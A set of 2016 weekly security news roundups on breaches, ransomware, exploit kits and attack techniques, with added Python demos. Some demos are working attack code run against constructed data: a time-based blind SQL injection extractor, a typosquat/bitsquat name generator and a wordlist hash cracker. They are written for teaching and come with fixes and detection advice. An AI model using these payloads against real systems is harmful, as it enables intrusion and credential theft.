Security Roundup - 2016-06-16

Verizon has had two communication redirect issues this week. In the first, a determined attacker convinced a Verizon rep to move a victim’s phone number to a new SIM, so that every call and text went to a phone the attacker controlled, including SMS two-factor authentication codes. Separately, Verizon patched a flaw in one of its systems that let an attacker redirect a victim’s email to an account of the attacker’s choosing, which would have captured password reset emails for any third-party accounts the customer had registered with that Verizon address. Both are reminders that a phone number or carrier mailbox is only as strong as the carrier’s account-recovery process; where a service offers an app- or hardware-based second factor, prefer it over SMS.

TeamViewer has been having a rough time, with a large number of customers reporting that their machines were accessed remotely by strangers. Speculation abounds over whether these accounts were taken over using passwords leaked in one of the many, many recent breaches, or whether TeamViewer itself has been breached.

Twitter felt the weight of a password leak this week and has already proactively started resetting passwords for some accounts. As with the TeamViewer incident, the current belief is that the credentials were cross-referenced from other breaches. Twitter says it is proactively cross-referencing and resetting accounts as new breaches come to light.

iMesh, a file-sharing service that recently went out of business, ALSO had old breached account data surface this week. Based on the available records, the breach appears to have occurred in 2013 and covers 51 million accounts, including passwords hashed with MD5. MD5 is a fast hash, so those passwords can be cracked quickly offline.

The Windows Background Intelligent Transfer Service (BITS), which Windows uses to asynchronously fetch things like software updates, has been abused to infect and re-infect systems: the malware creates BITS jobs that use the service’s “notification” feature to run a command when a transfer completes, giving it a persistent, scheduled re-download. Because BITS is a trusted Windows service, the downloads were not flagged as potentially malicious by some monitoring systems. Checking for this is straightforward: “bitsadmin /list /allusers /verbose” lists every job on the machine, and any job whose notification command line points at something other than a known updater deserves a closer look.

That is not the biggest vulnerability Microsoft patched, though. “BadTunnel” is a NetBIOS name-service spoofing attack that can be triggered through a variety of media (a web page or an Office document, for example) and lets an attacker hijack traffic and gain control of remote machines. Every version of Windows back to Windows 95 is affected.

Krebs has another fascinating/terrifying update on ATM insert skimmers, this time with videos of how they actually work and how hard they would be to spot in real life.

Ever wonder how a ransomware-as-a-service ring works? Business Insider has an interview with Flashpoint, whose researchers convinced one Russian ransomware boss to take them on as part of his ring.

Similar to the recent abrupt shutdown of TeslaCrypt, the Angler Exploit Kit appears to have shut down, with malware campaigns migrating to a variety of other exploit kits.

Security Roundup - 2016-06-09

Two big reports have landed this week.

The first is an analysis from Rapid7 and its Project Sonar, called the National Exposure Index. It details the most commonly exposed ports on the internet today. Among the observations: adoption of the encrypted alternatives to several protocols (POP3, SMTP, HTTP, IMAP) still lags behind the cleartext versions, the exception being SSH, which now outnumbers Telnet. That said, a great deal still responds as Telnet, and the authors are rightfully worried that so many internet-facing devices still expose it. “Most services on the internet are unencrypted, which is worrisome for any standards or enforcement body charged with keeping up a reasonable security profile for an organization.”

The second is Akamai’s State of the Internet report, which looks at the attack trends Akamai sees across its network. Some of the notable figures: ‘mega attacks’ (over 100 Gbps) are up 280% since last quarter; SQL injection attacks are up 87% since last quarter; more web application attacks are arriving over HTTPS, possibly because HTTPS is now deployed more widely; and reflectors such as NTP and DNS are increasingly used in DDoS attacks, with NTP reflection jumping 71%.

Related to the uptick in NTP reflection, ThreatPost reports on a number of NTP flaws that allow for denial of service attacks. These have all been disclosed and patched, so we will see whether next quarter’s State of the Internet report shows a corresponding drop in this type of DDoS.

The more payment processing news I read, the more convinced I am that maybe I should just switch back to cash I get straight from a teller at a physical bank. The latest example is another Krebs article on a point-of-sale botnet that has probably harvested more than 1.2 million credit cards. The impacted restaurants appear to be victims of social engineering, granting remote access to outsiders so they could run some ‘support tasks’.

I came across a fascinating extension of typosquatting to software packages. The author registered a number of packages on public package repositories with names that are slight misspellings of popular ones, each containing code that simply phoned home with some statistics; over a short period he received installs from 17,289 distinct hosts, and 43.6% of those ran the install with administrative rights.

Discussion of the above led me to another interesting article on bitsquatting, which is like typosquatting but based on single-bit differences rather than typing errors: a random memory error (a faulty chip, or a bit flipped by a cosmic ray) could conceivably send a client to the wrong, attacker-owned domain.
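To make the two squatting ideas concrete, here is an added example (not code from either article) that generates the candidate names an attacker would register: typing-error variants for a package name and single-bit-flip variants for a hostname. The keyboard-adjacency map is a hand-built subset of QWERTY, and the hostname character set is an assumption that ignores label-position rules for the hyphen.

```python
"""Generate typosquat and bitsquat variants of a name.

Added example for the two squatting items above; it is not from either
article. The candidate rules are the usual ones (omission, transposition,
adjacent-key substitution, single bit flip). ADJACENT is a constructed
subset of a QWERTY layout, not a full keyboard table.
"""
import string

# Characters legal in a hostname label (and in most package names).
HOST_CHARS = set(string.ascii_lowercase + string.digits + "-")

# Constructed adjacency map: which keys sit next to which on QWERTY.
ADJACENT = {
    "q": "wa", "w": "qes", "e": "wrd", "r": "etf", "t": "ryg", "y": "tuh",
    "u": "yij", "i": "uok", "o": "ipl", "p": "o",
    "a": "qsz", "s": "awdz", "d": "sefx", "f": "drgc", "g": "fthv", "h": "gjyb",
    "j": "hukn", "k": "jilm", "l": "ko", "z": "asx", "x": "zsdc", "c": "xdfv",
    "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}


def typosquats(name):
    """Typing-error variants: dropped character, swapped neighbours, fat-fingered key."""
    out = set()
    for i, ch in enumerate(name):
        out.add(name[:i] + name[i + 1:])                          # omission
        if i + 1 < len(name):
            out.add(name[:i] + name[i + 1] + ch + name[i + 2:])   # transposition
        for near in ADJACENT.get(ch, ""):
            out.add(name[:i] + near + name[i + 1:])               # adjacent key
    out.discard(name)
    return out


def bitsquats(name):
    """Variants exactly one bit away from `name`, keeping only hostname-legal results.

    Note that a flipped bit can turn a '.' into an 'n', so example.com has
    examplencom as a bitsquat: a whole different second-level domain.
    """
    out = set()
    for i, ch in enumerate(name):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped in HOST_CHARS and flipped != ch:
                out.add(name[:i] + flipped + name[i + 1:])
    return out


def squat_report(name):
    """How the two candidate sets compare; the bit-only names are the ones a typo list misses."""
    t, b = typosquats(name), bitsquats(name)
    return {"typo": len(t), "bit": len(b), "both": len(t & b), "bit_only": sorted(b - t)}


if __name__ == "__main__":
    for n in ("abc", "example.com"):
        print(n, squat_report(n))
```

The bit-only set is the practical takeaway: most of those names never appear on a typo-based watch list, which is why defenders who register or monitor typosquats still miss bitsquats.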

Sucuri points out that any form on your site becomes a data-theft channel if the site is ever compromised, and illustrates this with a Magento payment extension for Braintree. Attackers essentially reused the extension’s own data-collection code to harvest credit card and customer details and send them to a remote server for collection.

MalwareTech did a good job debunking the claim that Cerber had become polymorphic by generating a new hash every 15 seconds. Coincidentally, Fortinet has an article showing how a piece of malware becomes polymorphic by re-encrypting some of its functions on each use, meaning the sample’s signature changes on an individual machine over its lifetime.

Checkpoint recently pointed out a flaw in Facebook’s Messenger platform that would allow someone to modify messages after they were sent. Following malware trends, they posit that flaws like this would let a malicious actor keep updating the landing pages of links to malware as other products begin detecting and blocking the URLs, thus lengthening the window in which someone might click through and become infected.

BleepingComputer has the best roundup of ransomware news. This week features updates to existing families (including CryptXXX rebranding as UltraCrypter!), as well as new kids on the block: BlackShades, which taunts security researchers, and JuicyLemon, which interestingly asks victims to email a certain address for instructions.

Security Roundup - 2016-06-02

LinkedIn is apparently not the only service to have a large number of user accounts come to light this month. MySpace (breached sometime between 2007 and 2010), Tumblr (2013) and Fling (2011) are all data sets that have apparently been lying dormant, and together they add up to 642 million user accounts. Troy Hunt of Have I Been Pwned has indicated that these four breaches are in the top five of the 109 breaches he has recorded to date.

World-renowned password cracker Jeremi M. Gosney has an article on “How LinkedIn’s password sloppiness hurts us all”. He and a team cracked 98% of the LinkedIn password hashes, and did so in six days. The end result is a large corpus of real user passwords that can be used as a wordlist and analyzed to build newer, better mangling rules, which makes even slow hashing functions like bcrypt and Argon2 less effective, since crackers will need fewer attempts per account to break in.
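The cost difference Gosney is describing, shown as an added example (not code from his article). The leak and the wordlist are constructed; the hashes are unsalted SHA-1 because that is what LinkedIn stored in 2012, and the salted variant shows why a salt forces the attacker to pay for every candidate per user instead of once for the whole dump.

```python
"""Why a leaked cleartext corpus matters, and why unsalted fast hashes make it worse.

Added example, not code from Gosney's article. PASSWORDS and WORDLIST are
constructed for the demo. Unsalted SHA-1 is what LinkedIn used in 2012;
the salted variant is here for contrast and uses a random 8-byte salt.
"""
import hashlib
import os

# Constructed wordlist: the kind of entries a cracked corpus feeds back into a dictionary.
WORDLIST = ["password", "linkedin", "Summer2016", "letmein", "qwerty123", "Passw0rd!"]

# Constructed "user base": three weak passwords and one that is not in the wordlist.
PASSWORDS = {
    "alice": "password",
    "bob": "Summer2016",
    "carol": "Passw0rd!",
    "dave": "c0rrect-horse-battery",
}


def sha1_hex(data):
    return hashlib.sha1(data).hexdigest()


# The "leak": unsalted SHA-1 of every password, as LinkedIn stored them.
LEAK_UNSALTED = {user: sha1_hex(pw.encode()) for user, pw in PASSWORDS.items()}


def crack_unsalted(leak, wordlist):
    """Hash each candidate once, then join against every user at the same time.

    Returns (cracked users, number of hash computations).
    """
    table = {sha1_hex(w.encode()): w for w in wordlist}   # one hash per candidate, total
    cracked = {user: table[h] for user, h in leak.items() if h in table}
    return cracked, len(wordlist)


def make_salted(passwords):
    """The better-but-still-fast alternative: per-user salt, stored beside the hash."""
    return {user: (salt, sha1_hex(salt + pw.encode()))
            for user, pw in passwords.items()
            for salt in (os.urandom(8),)}


def crack_salted(leak, wordlist):
    """With a salt there is no shared lookup table: every candidate is hashed once per user."""
    cracked, hashes = {}, 0
    for user, (salt, h) in leak.items():
        for w in wordlist:
            hashes += 1
            if sha1_hex(salt + w.encode()) == h:
                cracked[user] = w
    return cracked, hashes


if __name__ == "__main__":
    print(crack_unsalted(LEAK_UNSALTED, WORDLIST))
    print(crack_salted(make_salted(PASSWORDS), WORDLIST))
```

Two things follow. Against the unsalted dump, six hash computations recover three of the four users at once, and a 98%-cracked corpus means the attacker’s next wordlist finds most users within its first few thousand entries. Against a salted slow hash such as bcrypt the attacker pays that per-user cost for every candidate, so shrinking the candidate list to what people actually use is exactly what makes the slow hash affordable to attack.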

Microsoft, meanwhile, has announced an initiative to better protect user passwords. One layer actively bans bad passwords, drawing on a list that Microsoft continually extends from the passwords it sees used in attacks. Another layer locks out accounts when sign-in attempts match certain criteria and actively notifies the account holder. These features are being rolled out to Azure AD in a limited beta.
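An added example, not Microsoft’s implementation, of the two layers above: a banned-password check that strips the usual disguises before comparing, and a lockout that trips after a burst of failures and tells the caller to notify the owner. The banned list, substitution table and thresholds are all assumptions chosen for the demo, and the real feature also weighs where the attempts come from, which this does not.

```python
"""Banned-password check with normalization, plus an attempt-based lockout.

Added example illustrating the two layers described above; it is not
Microsoft's code. BANNED, LEET, the trailing-junk rule and the lockout
thresholds are assumptions made for this demo.
"""
import re

# Constructed banned list: the bases people decorate with a year and a '!'.
BANNED = {"password", "letmein", "welcome", "summer", "qwerty"}

# Constructed substitution map: undo common leet-speak before comparing.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def normalize(pw):
    """Strip trailing digits/punctuation, then undo leet and case: 'P@ssw0rd2016!' -> 'password'."""
    pw = re.sub(r"[0-9\W_]+$", "", pw)
    return pw.lower().translate(LEET)


def is_banned(pw):
    """True if the normalized password contains any banned base word."""
    base = normalize(pw)
    return len(base) >= 4 and any(b in base for b in BANNED)


class SmartLockout:
    """Lock an account after `threshold` failures inside `window` seconds.

    Timestamps are passed in explicitly so the behaviour is testable.
    """

    def __init__(self, threshold=5, window=60.0, lock_for=300.0):
        self.threshold, self.window, self.lock_for = threshold, window, lock_for
        self.failures = {}       # account -> recent failure timestamps
        self.locked_until = {}   # account -> time the lock expires

    def is_locked(self, account, at):
        return self.locked_until.get(account, 0.0) > at

    def record_failure(self, account, at):
        """Return True when this failure trips the lock (the caller should notify the owner)."""
        recent = [t for t in self.failures.get(account, []) if at - t <= self.window]
        recent.append(at)
        self.failures[account] = recent
        if len(recent) >= self.threshold:
            self.locked_until[account] = at + self.lock_for
            self.failures[account] = []
            return True
        return False

    def record_success(self, account):
        self.failures.pop(account, None)


if __name__ == "__main__":
    for candidate in ("P@ssw0rd2016!", "Summer2016", "l3tm31n", "c0rrect-horse-battery"):
        print(candidate, "banned" if is_banned(candidate) else "ok")
```

The normalization is the part worth copying: a banned list compared byte-for-byte catches “password” and misses “P@ssw0rd2016!”, which is the form attackers actually see succeed.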

In terms of randomness, Tor goes to great lengths to generate enough randomness to encrypt all communications across its network. Naked Security has an article on how Tor generates shared randomness so that a handful of poisoned nodes cannot undermine the network as a whole.

For those procuring workstations for their employees, be sure to read this Duo article on OEM updater security. Duo found vulnerabilities in every OEM updater it examined that would allow arbitrary command execution as SYSTEM. While some attempts had been made to harden the updaters, more often than not basic security measures (TLS for the transport, signature validation of the update itself, validation of the manifest) were missing.

The Internet Crime Complaint Center (IC3) has published its 2015 report. Highlights: wire transfer fraud via phishing accounted for over $263 million in reported losses, corporate data breaches for ~$39 million, and malware for ~$5 million, with ransomware passing the $1 million mark at ~$1.6 million.

Checkpoint has an updated write-up of CryptXXX. Evolving out of TeslaCrypt, CryptXXX is delivered as a DLL that a legitimate Windows binary (rundll32) later executes, so there is no standalone executable to analyze and many sandboxes miss it. CryptXXX takes this one step further by delaying execution, to thwart sandboxes that only observe a sample for a short time.

This week I learned that some TLS implementations have failed to respect nonce uniqueness when using AES-GCM: every record sent under a given key must use a fresh nonce, and some servers were found repeating them, which opens the door to forgery attacks against HTTPS sites. Unfortunately, some VISA sites were among those found with the issue.
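What a repeated nonce gives away, as an added example that is not the researchers’ code. AES is not in the Python standard library, so the block function here is HMAC-SHA256 over (key, nonce, counter); that stand-in keeps the property that matters, namely that the keystream is a deterministic function of key and nonce, which is exactly how the encryption half of AES-GCM (counter mode) behaves. The forgery attack from the research additionally recovers GCM’s authentication key from such a pair; that GF(2^128) step is not implemented here.

```python
"""What nonce reuse in a counter-mode cipher leaks, and the fix.

Added example, not code from the reported research. keystream() is an
HMAC-SHA256 stand-in for AES-CTR so the block runs with the standard
library only; the reuse property demonstrated is the same. The sample
plaintexts are constructed.
"""
import hashlib
import hmac
import os


def keystream(key, nonce, length):
    """Deterministic keystream: block i = PRF(key, nonce || i). Stand-in for AES-CTR."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key, nonce, plaintext):
    """Counter-mode encryption: ciphertext = plaintext XOR keystream(key, nonce)."""
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


decrypt = encrypt   # XOR is its own inverse


def recover_with_known_plaintext(c1, p1, c2):
    """Two records under one (key, nonce): knowing p1 yields the keystream, hence p2.

    Recovers as many bytes of p2 as c1 covers; the rest stays unknown.
    """
    ks = xor(c1, p1)
    return xor(c2, ks[:len(c2)])


class NonceCounter:
    """The fix: a nonce that is a counter, so it cannot repeat under one key.

    Laid out like TLS 1.2 AES-GCM: 4-byte per-key salt + 8-byte explicit counter.
    """

    def __init__(self, salt):
        assert len(salt) == 4
        self.salt, self.count = salt, 0

    def next(self):
        if self.count == 2 ** 64 - 1:
            raise RuntimeError("nonce space exhausted: rekey before continuing")
        nonce = self.salt + self.count.to_bytes(8, "big")
        self.count += 1
        return nonce


if __name__ == "__main__":
    key = os.urandom(32)
    p1 = b"GET /account/settings HTTP/1.1"   # constructed: attacker knows this request
    p2 = b"Cookie: session=s3cr3t"           # constructed: the record worth stealing
    bad_nonce = b"\x00" * 12                  # the bug: same nonce for both records
    c1, c2 = encrypt(key, bad_nonce, p1), encrypt(key, bad_nonce, p2)
    print(recover_with_known_plaintext(c1, p1, c2))
```

The check a practitioner wants is on the wire: capture a handful of records from the server under test and confirm the 8-byte explicit nonce in each AES-GCM record is strictly increasing; a repeat, or random-looking values, is the finding.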

Security Roundup - 2016-05-26

Malware targeting wireless networking equipment has been making the rounds, impacting several ISPs. Despite a patch being available last July, many users appear to have been unaware and have not updated. The malware leaves a backdoor in a large range of devices, but otherwise appears to do nothing else malicious at this time.

Malware on USB devices, and users’ ability to plug those devices in, can allow for deep network penetration. Checkpoint has a story in which parts of a nuclear facility were infected. While the restricted networks were not infected, a number of USB devices were, which could have resulted in cross-contamination.

As more campaigns move away from TeslaCrypt and over to CryptXXX, TeslaCrypt has apparently shut down and released its master decryption key. Interestingly, Kaspersky defeated CryptXXX this week and updated its decryptor for it, prompting CryptXXX to release a new version, which was again promptly defeated.

A number of security researchers have blogged about obfuscation this week. Checkpoint has an interesting article on how spear-phishing malware is starting to include sandbox and analysis-tool detection and evasion techniques to slow down researchers. Sucuri has a fun article on a Joomla backdoor that stacked multiple obfuscation techniques. Fortinet has an interesting article on Android malware that, again, checks whether it is running in a virtual environment and encrypts its outbound communication. Finally, ThreatPost has a write-up of a new Microsoft Office macro obfuscation technique in which the payload is stored in the names of form buttons and triggered when they are clicked.

In further “I don’t know if I will ever use an ATM again” news, I’ve learned that some criminals deploy skimmer malware rather than just skimmer hardware. Initially popular between 2010 and 2013, a new variant was recently discovered by Kaspersky Lab after it was asked to investigate a bank robbery in which nothing appeared to have been stolen. The malware activates when a specific card is inserted, allowing the operator to do anything from printing out card IDs and PINs, to dispensing cash, to receiving an update.

A breach of LinkedIn data impacted 6.5 million users in 2012. It was recently discovered that another 117 million users were affected, with those accounts surfacing this week. Security experts are dissatisfied with LinkedIn’s decision at the time to reset only the accounts known to be impacted, which has left these 117 million users exposed and targeted years later. Troy Hunt has an interesting follow-up on LinkedIn’s response, the effect of breach disclosure on the price of the leaked data, and the phishing campaigns that accompany leak disclosures (because people are expecting password resets!).

In a follow-up to my previous coverage of MITRE, one security professional has complained about the difficulty of getting CVE numbers assigned to the vulnerabilities he finds, and has resorted to setting up websites to disclose them without CVEs as a result. MITRE has scrapped its previous decentralized proposal, meaning it is still being overwhelmed with CVE requests.

A coworker of mine recently introduced me to the concept of pastejacking, in which a web page overrides the contents of the clipboard when you copy from it. If the copied text looks innocent but is something you paste into a terminal, the replaced content runs instead, and a trailing newline is enough to execute it before you ever see it, leaving you running potentially malicious code. Pasting into an editor first, or enabling bracketed paste in your shell, takes the surprise out of it.

Security Roundup - 2016-05-18

With the new season of Mr. Robot on the way, fans are giving the show’s site some additional security scrutiny. One user found an XSS vulnerability that would have allowed a malicious actor to harvest visitors’ Facebook profile information, while another found a blind SQL injection giving access to the collected mailing list.

Who hacks the hackers? I am not sure, but the hacker forum Nulled.io was hacked recently and its data dumped. On initial review, it appears that the software powering the site suffered from numerous vulnerabilities that had not been addressed.

Cloudflare has an article on blind SQL injection via the User-Agent header. In this case the injected payload asks the database to sleep for a period of time, and the attacker knows the injection worked if the web request takes at least that long to return. Once injection is confirmed, the same delay serves as a one-bit oracle: an attacker can use it to enumerate users and password hashes one character at a time or, with software that has a known database structure (a blogging platform, say), inject database values into the comments table and read them back through the normal UI.
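The technique end to end, as an added example that is not Cloudflare’s code. The “application” is a constructed SQLite-backed visit logger that splices the User-Agent into its INSERT, with a sleep() function registered so the database can be stalled the way MySQL’s SLEEP() stalls it; the oracle extracts a secret one character at a time with a binary search on “is the Nth character’s code greater than X, and if so sleep”. The delay is kept short so the demo runs quickly, and the parameterised version sits beside the vulnerable one.

```python
"""Time-based blind SQL injection through the User-Agent header, and the fix.

Added example, not Cloudflare's code. The schema, the 'admin' row and the
DELAY are constructed for this demo; sleep() is registered to stand in
for MySQL's SLEEP(), which SQLite lacks.
"""
import sqlite3
import time

DELAY = 0.05   # seconds; a real attacker uses several seconds to beat network jitter


def build_db():
    db = sqlite3.connect(":memory:")
    db.create_function("sleep", 1, lambda s: time.sleep(s) or 0)   # MySQL-style SLEEP()
    db.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', '5f4dcc3b')")    # constructed secret
    db.execute("CREATE TABLE visits (ua TEXT)")
    return db


def log_visit_vulnerable(db, user_agent):
    """The bug: the header is spliced straight into the SQL text."""
    db.execute("INSERT INTO visits VALUES ('%s')" % user_agent)


def log_visit_fixed(db, user_agent):
    """The fix: a parameterised query, so the header is data and never SQL."""
    db.execute("INSERT INTO visits VALUES (?)", (user_agent,))


def oracle(db, position, threshold):
    """One probe: True iff ord(secret[position]) > threshold, judged purely by elapsed time.

    The payload closes the string literal, appends a CASE expression that only
    calls sleep() when the comparison holds, and reopens the literal so the
    statement stays syntactically valid.
    """
    payload = ("x' || (CASE WHEN (SELECT unicode(substr(pw_hash,%d,1)) FROM users "
               "WHERE name='admin') > %d THEN sleep(%f) ELSE 0 END) || '"
               % (position, threshold, DELAY))
    start = time.perf_counter()
    log_visit_vulnerable(db, payload)
    return time.perf_counter() - start >= DELAY * 0.8


def extract(db, max_len=16):
    """Recover the admin hash one printable ASCII character at a time (about 7 probes each)."""
    secret = ""
    for pos in range(1, max_len + 1):
        if not oracle(db, pos, 31):      # NULL past the end of the value: no sleep, so stop
            break
        lo, hi = 31, 127                 # invariant: ord > lo is True, ord > hi is False
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(db, pos, mid):
                lo = mid
            else:
                hi = mid
        secret += chr(hi)
    return secret


def fixed_stores_verbatim(db, user_agent):
    """With the parameterised INSERT the payload is stored as-is and nothing sleeps."""
    start = time.perf_counter()
    log_visit_fixed(db, user_agent)
    row = db.execute("SELECT ua FROM visits ORDER BY rowid DESC LIMIT 1").fetchone()
    return row[0] == user_agent and time.perf_counter() - start < DELAY


if __name__ == "__main__":
    print(extract(build_db()))   # recovers the constructed hash through timing alone
```

On the detection side, the same pattern shows up in access logs as a burst of requests from one client whose User-Agent contains SQL keywords and whose response times cluster at either a few milliseconds or a few seconds; that bimodal latency is the fingerprint of a binary search running through a time-based oracle.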

DarkReading has an interesting article on ‘10 Years of Human Hacking’, further detailing how easy it is to get users to plug in malware-laden USB drives. One story involves a marketing department taking a box of infected USB devices (planted as part of a pen test) to a conference to use as giveaways.

IBM is teaching Watson to fight crime. Cybercrime, that is. Teaming up with a number of universities, the plan is to feed security data into Watson so that it can learn to detect patterns and emerging threats.

Biometrics follow-up. The FBI doesn’t feel that privacy laws should apply to its ever-growing biometrics database. Meanwhile, researchers at Binghamton University have designed a new biometric based on brainwaves. Their technique measures the brain’s response to a series of images, and they currently report it as 100% accurate. Because the biometric is driven by external stimuli, it has the added advantage that it can be changed if compromised. The downside? It currently needs at least 27 images (at one image per second), oh, and you have to wear a cap of electrodes to measure the response.

Those interested in learning more about ‘ransomware-as-a-service’ will probably be interested in Checkpoint’s great rundown of the Nuclear Exploit Kit, which lets anyone willing to pay launch ‘malware campaigns’, complete with fancy dashboards and statistics. Strictly speaking Nuclear is an exploit kit for hire rather than ransomware itself; ransomware is simply the payload its customers most often deliver.

Attackers continue to exploit point-of-sale terminals, starting with Wendy’s owning up to a major data breach targeting its POS systems. The breach ‘only’ impacted a secondary POS system at 5% of its North American restaurants, but had a major impact on several credit unions that had previously reported fraud traced back to Wendy’s customers. Meanwhile, FireEye recently discovered a backdoor for Windows-based POS terminals, which it dubs ‘PunchBuggy’, that gives an attacker full access to the PoS system. Is it any surprise that the PCI Security Standards Council will be requiring better security measures from companies that accept payment information?
